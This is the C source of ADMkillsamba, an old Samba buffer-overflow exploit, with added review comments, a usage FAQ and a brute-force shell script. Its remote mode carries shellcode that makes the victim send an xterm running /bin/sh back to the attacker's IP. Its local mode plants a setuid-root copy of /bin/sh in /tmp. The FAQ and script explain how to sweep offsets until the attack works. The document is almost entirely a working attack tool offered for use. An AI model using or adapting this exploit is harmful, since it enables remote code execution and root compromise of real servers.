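/*
 *   ___  ______  _     _
 *  / _ \ |  _  \| \   / |     ADMkillsamba ver 0.2
 * / /_\ \| | | || |\_/| |     ADM back again ! :)))
 * |  _  || |_| || |   | |
 * |_| |_||____/ |_|   |_|     admsmb@hotmail.com
 *
 * What is new in 0.2:
 *   - a help section and a fast utility for finding SMB servers;
 *   - a shell script that brute-forces the buffer size / offset pair;
 *   - the buffer has a better structure;
 *   - an option for a local exploit.
 *
 * Usage:  ADMkillsamba R <victim ip> <netbios name> <your ip> [buff size] [offset]
 *         ADMkillsamba L <netbios name> [buff size] [offset]
 *
 * The remote mode builds a payload that makes the target run
 * "/usr/X11R6/bin/xterm -display <your ip>:0 -e /bin/sh"; the local mode
 * writes a helper script to /tmp/IK that copies /bin/sh to /tmp/.sh-r00t and
 * makes it setuid.  Either way the overlong share name is handed to
 * ./smbclient, which must be present in the current directory.
 *
 * NOTE(review): the #include and #define lines of this listing were stripped
 * by whatever rendered it ("#include #include" with no header names).  The
 * headers below are the ones the code needs; the three constants are
 * recovered from the usage text ("default is 3081", "default is 3500") and
 * from the shellcode being x86 (single-byte NOP is 0x90).
 */

#include <errno.h>
#include <inttypes.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define DEFAULT_OFFSET      3500   /* "default is 3500" in the usage text */
#define DEFAULT_BUFFER_SIZE 3081   /* "default is 3081" in the usage text */
#define NOP                 0x90   /* x86 one-byte NOP */

/*
 * Remote payload.  The xterm command, its display argument, a trailing
 * "call" fragment and padding are appended at run time, so the array is
 * oversized.  shellcode[3..4] is a short jmp (0xEB, rel8); the rel8 at
 * index 4 is patched once the appended string lengths are known, and since
 * rel8 is signed it must stay <= 0x7f or the jump goes backwards.
 */
unsigned char shellcode[500] =
"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";

/*
 * Local payload: an x86 Linux stub (mov al,0x0b ; int 0x80 -- execve) that
 * runs the path embedded at its end, /tmp/IK.  The script written to that
 * path by write_local_helper() is what actually does the work.
 */
unsigned char localshell[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/IK";

/* Print the command-line help (remote and local forms). */
static void usage(void)
{
    printf(" usage Remote: ADMkillsamba R <victim ip> <netbios name> <your ip> [buff size] [offset size]\n");
    printf(" <victim ip> = 11.11.11.11 ! THe numerical IP Only ! not www.xxx.cc !\n");
    printf(" <netbios name> = VICTIME for get the netbios name use ADMnmbname or ADMhack\n");
    printf(" <your ip> = the sploit send a xterm to your machine heh \n");
    printf("option:\n");
    printf("[buff size] = the size of the buffer to send default is 3081 try +1 -1 to a plage of +10 -10\n");
    printf("[offset size] = the size of the offset default is 3500 try +50 -50 to a plage of 1000 -1000\n");
    printf("usage Local: ADMkillsamba L <netbios name> [buffer size] [offset size]\n");
    printf(" HaVe Fun\n");
}

/*
 * Parse a decimal integer argument.  Unlike atoi(), trailing junk, overflow
 * and values below `min` are rejected.  Returns 0 and stores into *out on
 * success, -1 (with a message on stderr) otherwise.
 */
static int parse_int(const char *s, const char *what, long min, int *out)
{
    char *end;
    long v;

    errno = 0;
    v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE || v < min || v > INT_MAX) {
        fprintf(stderr, "bad %s: '%s'\n", what, s);
        return -1;
    }
    *out = (int)v;
    return 0;
}

/*
 * Bounded replacement for the original strcpy(argv[i]) calls: copies src
 * into dst[dstsz] and fails (rather than truncating silently) when it does
 * not fit.  A truncated NetBIOS name or IP would just make the exploit miss.
 */
static int copy_arg(char *dst, size_t dstsz, const char *src, const char *what)
{
    int n = snprintf(dst, dstsz, "%s", src);

    if (n < 0 || (size_t)n >= dstsz) {
        fprintf(stderr, "%s is too long (max %zu bytes)\n", what, dstsz - 1);
        return -1;
    }
    return 0;
}

/*
 * Append `piece` to the global remote shellcode, refusing to overrun its
 * fixed 500-byte array (the original used unchecked strcat).  Returns 0 on
 * success, -1 if the piece plus the terminating NUL would not fit.
 */
static int append_payload(const unsigned char *piece)
{
    size_t have = strlen((const char *)shellcode);
    size_t add = strlen((const char *)piece);

    if (add >= sizeof shellcode - have)
        return -1;
    memcpy(shellcode + have, piece, add + 1);
    return 0;
}

/*
 * Local mode: write the helper script that the local payload execve()s.
 * Returns 0 on success, -1 on any I/O failure (each was unchecked before).
 *
 * NOTE(review): the path /tmp/IK is baked into localshell[] and so cannot be
 * randomised here.  It lives in a world-writable directory and fopen("w+")
 * follows symlinks, so another local user who pre-creates /tmp/IK (or a
 * symlink there) can hijack or redirect this write.
 */
static int write_local_helper(void)
{
    struct stat st;
    FILE *f = fopen("/tmp/IK", "w+");

    if (f == NULL) {
        perror("/tmp/IK");
        return -1;
    }
    fprintf(f, "#!/bin/sh\n");
    fprintf(f, "cp /bin/sh /tmp/.sh-r00t\n");
    fprintf(f, "chmod 4777 /tmp/.sh-r00t\n");
    if (fflush(f) != 0) {
        perror("write /tmp/IK");
        fclose(f);
        return -1;
    }
    /* Same effect as the original system("chmod a+x /tmp/IK") -- keep the
     * existing permission bits and add the three execute bits -- but done on
     * the open descriptor, without spawning a shell. */
    if (fstat(fileno(f), &st) != 0 ||
        fchmod(fileno(f), (st.st_mode & 07777) | S_IXUSR | S_IXGRP | S_IXOTH) != 0) {
        perror("chmod /tmp/IK");
        fclose(f);
        return -1;
    }
    if (fclose(f) != 0) {
        perror("close /tmp/IK");
        return -1;
    }
    return 0;
}

/*
 * Lay out the overflow string in buff[bsize]:
 *   - every 4-byte slot holds the guessed return address `addr`;
 *   - the first half is then overwritten with a NOP sled;
 *   - the shellcode is centred on the buffer;
 *   - the last byte is a NUL so it can travel as an argv string.
 * Returns -1 when the shellcode does not fit (the original would have run
 * the pointer off the buffer), 0 otherwise.  Caller guarantees bsize >= 1.
 */
static int build_buffer(char *buff, size_t bsize, uint32_t addr)
{
    size_t codelen = strlen((const char *)shellcode);
    size_t start, i;

    if (codelen == 0 || codelen / 2 > bsize / 2)
        return -1;
    start = bsize / 2 - codelen / 2;
    if (codelen > bsize - 1 - start)
        return -1;

    /* A bsize that is not a multiple of 4 gets a partial last word; the
     * original stored a full long there and overran the heap by 1..3 bytes. */
    for (i = 0; i < bsize; i += sizeof addr) {
        size_t chunk = bsize - i < sizeof addr ? bsize - i : sizeof addr;
        memcpy(buff + i, &addr, chunk);
    }
    memset(buff, NOP, bsize / 2);
    memcpy(buff + start, shellcode, codelen);
    buff[bsize - 1] = '\0';
    return 0;
}

/*
 * Entry point.  argv[1] selects the mode ('R' remote, 'L' local); the
 * remaining arguments are the target, name and optional tuning values
 * described in usage().  All argv copies are bounded and the mode-specific
 * argument counts are checked before any argv[] element is dereferenced.
 * Exit status: 0 after printing usage (as before), 1 on any error; on
 * success the process is replaced by ./smbclient and does not return.
 */
int main(int argc, char *argv[])
{
    char *buff;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    char netbios_name[100] = {0};
    char bufferz[255] = {0};
    char ipz[40] = {0};
    /* bla[1..5] is an x86 "call rel32" (0xE8); bla[2], the low displacement
     * byte, is patched below to match the appended string lengths. */
    unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff";
    unsigned char cmd[50] = "/usr/X11R6/bin/xterm\xff-display\xff";
    unsigned char arg1[50] = {0};
    uint32_t addr;
    int n;

    if (argc < 3) {
        usage();
        exit(0);
    }

    if (argv[1][0] == 'R') {
        size_t lens;

        /* Remote mode reads argv[2..4]; the original only checked argc < 3. */
        if (argc < 5) {
            usage();
            exit(0);
        }
        printf("Remote sploit\n");

        n = snprintf((char *)arg1, sizeof arg1, "%s:0\xff-e\xff/bin/sh\xff", argv[4]);
        if (n < 0 || (size_t)n >= sizeof arg1) {
            fprintf(stderr, "your ip is too long (max %zu bytes)\n", sizeof arg1 - 14);
            return 1;
        }

        /* Both patched bytes are functions of the appended string lengths.
         * The jmp rel8 at shellcode[4] is signed, so the sum must stay
         * within 0x7f; past that the jump lands behind the payload. */
        lens = strlen((const char *)cmd) + strlen((const char *)arg1);
        if (0x32 + lens > 0x7f) {
            fprintf(stderr, "your ip is too long for the short jmp in the payload\n");
            return 1;
        }
        shellcode[4] = (unsigned char)(0x32 + lens);
        bla[2] = (unsigned char)(0xc9 - lens);

        if (argc > 5 && parse_int(argv[5], "buff size", 1, &bsize) != 0)
            return 1;
        if (argc > 6 && parse_int(argv[6], "offset size", INT_MIN, &offset) != 0)
            return 1;

        if (append_payload(cmd) != 0 ||
            append_payload(arg1) != 0 ||
            append_payload(bla) != 0 ||
            append_payload((const unsigned char *)
                "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx") != 0) {
            fprintf(stderr, "payload does not fit in the shellcode buffer\n");
            return 1;
        }

        if (copy_arg(ipz, sizeof ipz, argv[2], "victim ip") != 0 ||
            copy_arg(netbios_name, sizeof netbios_name, argv[3], "netbios name") != 0)
            return 1;
    } else if (argv[1][0] == 'L') {
        printf("Local sploit\n");
        /* sizeof localshell includes its NUL and is far below 500 bytes. */
        memcpy(shellcode, localshell, sizeof localshell);
        if (copy_arg(netbios_name, sizeof netbios_name, argv[2], "netbios name") != 0)
            return 1;
        strcpy(ipz, "127.0.0.1");
        if (argc > 3 && parse_int(argv[3], "buff size", 1, &bsize) != 0)
            return 1;
        if (argc > 4 && parse_int(argv[4], "offset size", INT_MIN, &offset) != 0)
            return 1;
        if (write_local_helper() != 0)
            return 1;
    } else {
        /* The original fell through here with empty name/ip buffers. */
        usage();
        exit(0);
    }

    if (!(buff = malloc((size_t)bsize))) {
        printf("Can't allocate memory.\n");
        return 1;
    }

    n = snprintf(bufferz, sizeof bufferz, "\\\\\\\\%s\\\\IPC$", netbios_name);
    if (n < 0 || (size_t)n >= sizeof bufferz) {
        fprintf(stderr, "netbios name is too long for the share path\n");
        free(buff);
        return 1;
    }

    /* 32-bit target address: the shellcode is i386 and 0xbffffff0 is the
     * top of the classic Linux/i386 stack, so keep it a 32-bit word even
     * when this tool is built on a 64-bit host. */
    addr = 0xbffffff0u - (uint32_t)offset;
    printf("Using address: 0x%" PRIx32 "\n", addr);

    if (build_buffer(buff, (size_t)bsize, addr) != 0) {
        fprintf(stderr, "buff size %d is too small for a %zu byte payload\n",
                bsize, strlen((const char *)shellcode));
        free(buff);
        return 1;
    }

    /* Arguments go straight to smbclient's argv -- no shell is involved. */
    execl("./smbclient", "smbclient", bufferz, buff, "-I", ipz, (char *)NULL);
    perror("execl ./smbclient");
    free(buff);
    return 1;
}

/* --------------------------------small help------------------------------------ */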
ADMsmb HELP v0.1 (a quick help)

Q: Why does the exploit always give me the message "Broken pipe"?
A: This message appears when you do not have the right buffer_size/offset pair. Yes, these parameters change on every machine -- you must find them yourself. To do that, brute-force the buffer size/offset with the script below.

-------------------------------Brute Force-----------------------------------
#!/bin/sh
# Sweep the offset from 1000 to 8000 in steps of 25 for each buffer size,
# starting at 3081 and increasing by one.  Note that ADMkillsamba expects the
# mode and the target arguments BEFORE the two tuning values, so fill in the
# placeholders:  R <victim ip> <netbios name> <your ip> $BUFF $D
# The outer loop never ends on its own; stop it once the xterm appears.
declare -i D
declare -i OFF
declare -i try
declare -i BUFF
BUFF=3081    # buffer size
while true
do
    D=1000   # offset
    while test "$D" -lt 8000
    do
        ./ADMkillsamba R <victim ip> <netbios name> <your ip> $BUFF $D
        echo
        echo $D
        echo $BUFF
        echo
        D=D+25
    done
    BUFF=BUFF+1
done
---------------------------------------------------------------------------------

Q: What are the best parameters for buffer size / offset?
A: First try buffer=3081, offset=3500. If that does not work, try changing the offset from 1000 to 8000. If it still does not run, try buffer sizes from 3075 to 3090. I know it is hard, but with experience it is simple. :)

Q: How do I find the buffer size?
A: Simple! Launch ADMkillsamba with a buffer size of 1000. If the server does not give a broken pipe, the buffer was too small: increase it in steps of 100. Once the server gives you a broken pipe, narrow down the precise value and scan around it. Example:
    buff = 3000  no broken pipe
    buff = 3100  broken pipe
    buff = 3050  no broken pipe
    buff = 3070  broken pipe   <-- scan from 3070 to 3100

Q: And the offset?
A: Scan for it. :)

PS: If you find a working offset & buffer size on a system, please send it in; I am going to make a list of the most common buffer size/offset pairs.
PPS: If you want to code shellcode for another OS, mail me!
News: ADM is going to make a home page for this exploit; do not forget to check it for more help, tips, etc. cya
--------------------------------------------------------------------------------
YOU CAN GET THE BINARY OF ADMFINDALL AT FTP.JANOVA.ORG/PUB/ADM !!!!!!